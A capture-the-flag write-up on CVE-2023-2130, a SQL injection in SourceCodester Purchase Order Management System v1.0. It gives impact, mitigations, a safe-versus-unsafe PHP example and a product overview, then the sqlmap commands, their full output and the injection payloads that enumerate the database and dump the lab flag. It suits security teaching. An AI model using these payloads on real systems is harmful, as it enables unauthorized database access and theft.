


CVE-2023-2130 is a SQL injection vulnerability affecting SourceCodester Purchase Order Management System v1.0. The vulnerability exists because the application fails to properly filter and validate user input, allowing an attacker to execute arbitrary SQL commands via SQL injection and thereby gain unauthorized access to, and manipulate, the database.


  1. Retrieving sensitive data: for example user credentials and personal information.
  2. Modifying or deleting data: records in the database can be tampered with or removed.
  3. Performing administrative actions: an attacker may obtain administrator privileges and carry out higher-level operations.


  1. Use prepared statements: prepared statements and parameterized queries effectively prevent SQL injection.
  2. Input validation and filtering: strictly validate and filter user input so that only legitimate values are accepted.
  3. Principle of least privilege: the database user should hold only the minimum privileges needed for its operations; avoid running day-to-day operations under a high-privilege account.
  4. Secure coding practices: adopt secure coding practices, such as using an ORM (object-relational mapping) framework for database operations, and avoid concatenating SQL statements by hand.
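As an added illustration (not code from the SourceCodester project), the following PHP places the unsafe pattern this CVE describes next to a hardened handler that applies points 1 to 3 above. The file name, the supplier column names and the po_readonly account are assumptions; the endpoint parameter and the supplier_list table come from the write-up.

```php
<?php
// Added example, not the project's own code. view_details.php, the column
// names and the po_readonly account are assumptions for illustration.

// --- Unsafe pattern: the kind of code CVE-2023-2130 describes ---
// $_GET['id'] is concatenated straight into the SQL text, so a value such as
// 2' AND 4461=4461 AND 'TVzr'='TVzr (sqlmap's boolean-blind probe) becomes
// part of the statement instead of being treated as data.
function view_supplier_unsafe(mysqli $conn, string $id): ?array
{
    $sql = "SELECT * FROM supplier_list WHERE id = '{$id}'";
    $res = $conn->query($sql);
    return $res ? $res->fetch_assoc() : null;
}

// --- Hardened version: validate first, then bind ---
function view_supplier_safe(PDO $pdo, $rawId): ?array
{
    // 1. Input validation: id is an integer key; reject anything else
    //    (including the quote-bearing probes seen in the sqlmap output).
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);
        return null;
    }
    // 2. Prepared statement: the query text is fixed; the value travels
    //    separately and cannot alter the statement's structure.
    $stmt = $pdo->prepare(
        'SELECT id, supplier_name, contact, address FROM supplier_list WHERE id = :id'
    );
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// 3. Least privilege: read paths use a read-only account (assumed name), and
//    emulated prepares are disabled so MySQL parses the placeholders itself.
$pdo = new PDO(
    'mysql:host=127.0.0.1;dbname=purchase_order_db;charset=utf8mb4',
    'po_readonly',
    getenv('PO_DB_PASSWORD'),
    [PDO::ATTR_EMULATE_PREPARES => false, PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]
);
$supplier = view_supplier_safe($pdo, $_GET['id'] ?? '');
```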






Regularly hold cybersecurity competitions, such as CTF (Capture The Flag) events, to stimulate learners' interest and motivation.




SourceCodester Purchase Order Management System v1.0 is a web-based application designed to simplify and manage the purchase order workflow. It is aimed primarily at small and medium-sized businesses, with the goals of improving procurement efficiency, reducing manual processing errors, and keeping purchasing records transparent and traceable.


  1. User management

    • Administrators can add, edit and delete user accounts and assign different permission levels, so that only authorized users can access and manage purchase orders.
  2. Supplier management

    • Users can add and manage supplier information, including supplier name, contact details and address, which makes it quick to select and contact a supplier when creating a purchase order.
  3. Purchase order management

    • Users can create, edit and view purchase orders. Each order includes supplier information, order date, delivery date, order status and a detailed product list.
  4. Product management

    • The system allows product information to be added and managed, including product name, description, price and stock quantity. Users can select products when creating a purchase order.
  5. Reports and records

    • Detailed purchase order reports and history make it easy to review past orders and the status of current ones.
  6. Notification system

    • The system can send notifications reminding users to handle new orders or update order status.


  • Front end: built with HTML, CSS and JavaScript, providing a user-friendly interface.
  • Back end: developed in PHP, handling business logic and database operations.
  • Database: MySQL stores and manages the data, ensuring persistence and integrity.


To install and run SourceCodester Purchase Order Management System v1.0, you need:

  1. A web server: such as Apache or Nginx.
  2. A PHP environment: make sure PHP is installed and configured on the server.
  3. A database: set up a MySQL database and import the provided database script.


  • Streamlined procurement: systematic management improves the efficiency and accuracy of the purchasing process.
  • Ease of use: an intuitive user interface lets users get started quickly.
  • Flexible administration: multi-user and permission management support keeps the system secure and adaptable.

SourceCodester Purchase Order Management System v1.0 is a practical tool for businesses and organizations that want to optimize their procurement process.





Try tampering with the id parameter.

Dump the database with SQLMap.

└─# sqlmap -u "http://eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu/admin/suppliers/view_details.php?id=2" --dbs   
 ___ ___[.]_____ ___ ___  {1.8.4#stable}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:44:28 /2024-07-05/

[20:44:28] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=2807ae4e6fb...91fa107729'). Do you want to use those [Y/n] n
[20:44:30] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:44:30] [INFO] testing if the target URL content is stable
[20:44:30] [INFO] target URL content is stable
[20:44:30] [INFO] testing if GET parameter 'id' is dynamic
[20:44:31] [INFO] GET parameter 'id' appears to be dynamic
[20:44:31] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[20:44:31] [INFO] testing for SQL injection on GET parameter 'id'
[20:44:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:44:31] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable 
[20:44:33] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL' 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] n
[20:44:34] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[20:44:34] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:44:34] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[20:44:35] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:44:35] [INFO] testing 'Generic inline queries'
[20:44:35] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:44:35] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:44:35] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:44:35] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:44:45] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[20:44:45] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:44:45] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:44:45] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[20:44:45] [INFO] target URL appears to have 8 columns in query
do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] n
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] n
[20:44:52] [WARNING] if UNION based SQL injection is not detected, please consider usage of option '--union-char' (e.g. '--union-char=1') and/or try to force the back-end DBMS (e.g. '--dbms=mysql') 
[20:44:53] [INFO] target URL appears to be UNION injectable with 8 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] n
[20:44:56] [INFO] checking if the injection point on GET parameter 'id' is a false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 140 HTTP(s) requests:
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2' AND 4461=4461 AND 'TVzr'='TVzr

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=2' AND (SELECT 4095 FROM (SELECT(SLEEP(5)))HoPf) AND 'jALb'='jALb
[20:44:58] [INFO] the back-end DBMS is MySQL
web application technology: PHP, PHP 7.3.33
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:44:58] [INFO] fetching database names
[20:44:58] [INFO] fetching number of databases
[20:44:58] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:44:58] [INFO] retrieved: 4
[20:44:58] [INFO] retrieved: information_schema
[20:45:05] [INFO] retrieved: mysql
[20:45:07] [INFO] retrieved: performance_schema
[20:45:13] [INFO] retrieved: purchase_order_db
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] purchase_order_db

[20:45:19] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu'


└─# sqlmap -u "http://eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu/admin/suppliers/view_details.php?id=2" -D "purchase_order_db" --tables
 ___ ___[,]_____ ___ ___  {1.8.4#stable}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:48:52 /2024-07-05/

[20:48:52] [INFO] resuming back-end DBMS 'mysql' 
[20:48:52] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=78d32b89ed9...f529d4ed65'). Do you want to use those [Y/n] n
sqlmap resumed the following injection point(s) from stored session:
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2' AND 4461=4461 AND 'TVzr'='TVzr

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=2' AND (SELECT 4095 FROM (SELECT(SLEEP(5)))HoPf) AND 'jALb'='jALb
[20:48:53] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.3.33, PHP
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:48:53] [INFO] fetching tables for database: 'purchase_order_db'
[20:48:53] [INFO] fetching number of tables for database 'purchase_order_db'
[20:48:53] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:48:53] [INFO] retrieved: 7
[20:48:54] [INFO] retrieved: item_list
[20:48:57] [INFO] retrieved: users
[20:48:59] [INFO] retrieved: supplier_list
[20:49:04] [INFO] retrieved: po_list
[20:49:07] [INFO] retrieved: system_info
[20:49:11] [INFO] retrieved: fllllaaaag
[20:49:16] [INFO] retrieved: order_items
Database: purchase_order_db
[7 tables]
| fllllaaaag    |
| item_list     |
| order_items   |
| po_list       |
| supplier_list |
| system_info   |
| users         |

[20:49:20] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu'


└─# sqlmap -u "http://eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu/admin/suppliers/view_details.php?id=2" -D "purchase_order_db" -T "fllllaaaag" --columns
 ___ ___["]_____ ___ ___  {1.8.4#stable}
|_ -| . [(]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:50:10 /2024-07-05/

[20:50:11] [INFO] resuming back-end DBMS 'mysql' 
[20:50:11] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=4a6065bd9e1...c4ebe38f25'). Do you want to use those [Y/n] n
sqlmap resumed the following injection point(s) from stored session:
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2' AND 4461=4461 AND 'TVzr'='TVzr

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=2' AND (SELECT 4095 FROM (SELECT(SLEEP(5)))HoPf) AND 'jALb'='jALb
[20:50:12] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.3.33, PHP
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:50:12] [INFO] fetching columns for table 'fllllaaaag' in database 'purchase_order_db'
[20:50:12] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:50:12] [INFO] retrieved: 2
[20:50:13] [INFO] retrieved: id
[20:50:14] [INFO] retrieved: int(20)
[20:50:18] [INFO] retrieved: flag
[20:50:19] [INFO] retrieved: text
Database: purchase_order_db
Table: fllllaaaag
[2 columns]
| Column | Type    |
| flag   | text    |
| id     | int(20) |

[20:50:21] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu'


└─# sqlmap -u "http://eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu/admin/suppliers/view_details.php?id=2" -D "purchase_order_db" -T "fllllaaaag" -C "flag" --dump
 ___ ___[(]_____ ___ ___  {1.8.4#stable}
|_ -| . [']     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:50:39 /2024-07-05/

[20:50:40] [INFO] resuming back-end DBMS 'mysql' 
[20:50:40] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=c930771f176...8c2072b16f'). Do you want to use those [Y/n] n
sqlmap resumed the following injection point(s) from stored session:
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2' AND 4461=4461 AND 'TVzr'='TVzr

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=2' AND (SELECT 4095 FROM (SELECT(SLEEP(5)))HoPf) AND 'jALb'='jALb
[20:50:41] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.3.33, PHP
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:50:41] [INFO] fetching entries of column(s) 'flag' for table 'fllllaaaag' in database 'purchase_order_db'
[20:50:41] [INFO] fetching number of column(s) 'flag' entries for table 'fllllaaaag' in database 'purchase_order_db'
[20:50:41] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:50:41] [INFO] retrieved: 1
[20:50:42] [INFO] retrieved: flag{fd914d13-e36b-42df-8b11-881ffdfa8d5e}
Database: purchase_order_db
Table: fllllaaaag
[1 entry]
| flag                                       |
| flag{fd914d13-e36b-42df-8b11-881ffdfa8d5e} |

[20:51:00] [INFO] table 'purchase_order_db.fllllaaaag' dumped to CSV file '/root/.local/share/sqlmap/output/eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu/dump/purchase_order_db/fllllaaaag.csv'
[20:51:00] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu'

[*] ending @ 20:51:00 /2024-07-05/
